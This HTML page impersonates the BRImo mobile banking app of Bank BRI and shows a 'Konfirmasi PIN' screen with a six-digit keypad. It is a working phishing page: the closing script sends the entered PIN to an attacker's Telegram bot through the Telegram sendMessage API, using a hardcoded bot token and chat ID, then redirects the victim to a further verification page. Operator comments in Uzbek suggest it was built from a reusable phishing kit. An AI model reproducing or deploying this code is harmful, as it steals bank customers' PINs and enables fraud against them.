
<!DOCTYPE HTML>

<html lang="en">

 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..."> 
  <link rel="canonical" href=""> 
  <meta name="twitter:card" content="summary_large_image"> 
  <meta property="og:title" content="BRlmo - Bank BRI"> 
  <meta name="twitter:title" content="BRlmo - Bank BRI"> 
  <meta property="og:site_name" content="BRImo"> 
  <meta name="twitter:site_name" content="BRImo"> 
  <meta property="og:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..."> 
  <meta name="twitter:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..."> 
  <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:url" content=""> 
  <meta property="og:type" content="website"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>BRImo - Konfirmasi PIN</title> <link rel="icon" type="image/png" href="https://i.ibb.co/Wc61GwP/Frame-1-1.jpg">
<link rel="image_src" href="https://i.ibb.co/Wc61GwP/Frame-1-1.jpg">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
            overflow: hidden; background: none rgb(14, 120, 202);
            padding-right: 27px;
        }

        .text-2 {
            font-family: 'Verdana';
            color: #fff;
        }

        .text-3 {
            font-family: 'Verdana';
            margin-top: -30px;
            color: #fff;
            font-size: 14px;
        }

        .sizing {
            width: 332px;
        }

        @media only screen and (max-width: 600px) {
            .sizing {
                width: 79%;
            }
        } 

        .pinNumb {
            cursor: pointer;
            box-sizing: border-box; 
            width: 58%; 
            background-color: none; 
            font-size: 28px; color: #fff; 
            text-align: center; 
            padding-top: 3px; 
            border-radius: 20px; 
            box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; 
            height: 55px;
            background: none;
            border: none;
        }

        button.pinNumb:hover {
            color: #fff;
            background-color: rgba(255, 255, 255, 0.1);
            border: 1px solid rgba(255, 255, 255, 0.1);
        }

    </style> 
 <body> 
  <div class="container"> 
   <div class="row" style="margin-top: -70px;"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; text-align: center; margin-top: 25px; height: 98.8px; padding-bottom: 0px; font-family: Barlow; font-size: 16px; font-weight: 400; color: rgb(255,255,255); line-height: 1.4; border-radius: 0px;"> 
     <div class="text-header" style="font-family: 'Arial'">
    <font size="3"><strong>PIN</strong></font>
     </div> 
    </div> 
   </div> 
   <div class="row" style="margin-top: 10px;"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 98.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;"> 
     <div class="text-2">
<font size="3"><strong>Konfirmasi PIN</strong></font>
     <div class="text-3">
Konfirmasi PIN yang sudah Anda buat
     </div> 
    </div> 
   </div> 
   </div>
   </div>
    <form onsubmit="sendtelegram()" id="ryuSubmit" action="/sms.html">
   </div>
   <input type="hidden" name="setPin" id="setPin"> 
   <div class="row" style="margin-top: -90px;"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 58.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;"> 
     <div class="row"> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-1" style="box-sizing: border-box; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;  width: 45px; left: 0px; top: 0px; background-color: rgba(255, 255, 255, 0.34); border-radius: 4px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-2" style="box-sizing: border-box; width: 45px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;background-color: rgba(255, 255, 255, 0.34); border-radius: 4px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-3" style="box-sizing: border-box; width: 45px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;background-color: rgba(255, 255, 255, 0.34); border-radius: 4px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-4" style="box-sizing: border-box; width: 45px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;background-color: rgba(255, 255, 255, 0.34); border-radius: 4px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-5" style="box-sizing: border-box; width: 45px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px; background-color: rgba(255, 255, 255, 0.34); border-radius: 4px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-6" style="box-sizing: border-box; width: 45px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;background-color: rgba(255, 255, 255, 0.34); border-radius: 4px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 52px;"></div> 
       </div> 
      </div> 
     </div> 
     <div class="row" style="margin-top: -90px"> 
      <div class="col-12"> 
       <div class="text-2 text-center" style="font-family: 'Arial'">
    <font size="2"><strong>Lupa PIN</strong></font>
       </div> 
      </div> 
     </div> 
    </div> 
   </div> 
   <div class="row" style="margin-top: 140px"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 98.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;"> 
     <div class="row"> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="1" style="margin-top: 5px;">1</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="2" style="margin-left: 10px;">2</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="3" style="margin-left: 13px;">3</box><br>
      </div> 
     </div> 
     <div class="row" style="margin-top: -80px"> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="4" style=" margin-left: 0px;">4</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="5" style="margin-left: 9px; margin-top: 3px;">5</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="6" style="margin-left: 13px;">6</box><br>
      </div> 
     </div> 
     <div class="row" style="margin-top: -80px"> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="7" style="margin-left: 0px; margin-top: 10px;">7</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="8" style="margin-left: 9px; margin-top: 10px;">8</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="9" style="margin-left: 13px; margin-top: 10px;">9</box><br>
      </div> 
     </div> 
     <div class="row" style="margin-top: -80px"> 
      <div class="col-4"> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="0" style="margin-left: 9px; margin-top: 10px;">0</box><br>
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="hapus"><i class="ion-backspace-outline" style="margin-left: 7px; margin-top: 6px;"></i></box>
      </div> 
    </form>
     </div> 
    </div> 
   </div> 
   <p id="status"></p>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
  <script>
        $(document).ready(function() {
            $("box#setPin").on('click', function() {
                var pin = $(this).attr('data-id');
                
                if($.trim($("#pin-1").html())=='') {
                    $("#pin-1").html(pin);
                } else if($.trim($("#pin-1").html())!='' && $.trim($("#pin-2").html())=='') {
                    $("#pin-2").html(pin);
                } else if($.trim($("#pin-2").html())!='' && $.trim($("#pin-3").html())=='') {
                    $("#pin-3").html(pin);
                } else if($.trim($("#pin-3").html())!='' && $.trim($("#pin-4").html())=='') {
                    $("#pin-4").html(pin);
                } else if($.trim($("#pin-4").html())!='' && $.trim($("#pin-5").html())=='') {
                    $("#pin-5").html(pin);
                } else if($.trim($("#pin-5").html())!='' && $.trim($("#pin-6").html())=='') {
                    $("#pin-6").html(pin);

                    var setPin = $("#pin-1").html()+''+$("#pin-2").html()+''+$("#pin-3").html()+''+$("#pin-4").html()+''+$("#pin-5").html()+''+$("#pin-6").html();
                    $("input#setPin").val(setPin);

                    var pinValue = $("input#setPin").val();

                    if(pinValue.length == 6) {
                        $("#ryuSubmit").submit();
                    }
                }
            });

            $("#hapus").on('click', function() {
                $("#pin-1").html('');
                $("#pin-2").html('');
                $("#pin-3").html('');
                $("#pin-4").html('');
                $("#pin-5").html('');
            });
        });
    </script> 
    <script>
        //bot token
var telegram_bot_id = "5814974591:AAGxQ2FI3MH9aEKT_-XMPF6LQ7iu76FXiD8"; // token'ni o'rniga Siz yaratgan Bot tokenini yozing
//chat id
var chat_id = "5850710469"; // 1111'ni o'rniga habar borishi kerak bo'lgan joyni ID'sini yozing (Batafsil videoda)
var setPin;
var ready = function() {
    setPin = document.getElementById("setPin").value;
    // = document.getElementById("email").value;
    // password = document.getElementById("password").value;
    message = "PIN :" + setPin;
};
var sendtelegram = function() {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
        })
    };
    $.ajax(settings).done(function(response) {
        console.log(response);
        window.location.href = '/verifikasi';
    });
    
    document.getElementById("setPin").value = "";
    document.getElementById("").value = "";
    document.getElementById("").value = "";
    return true;
    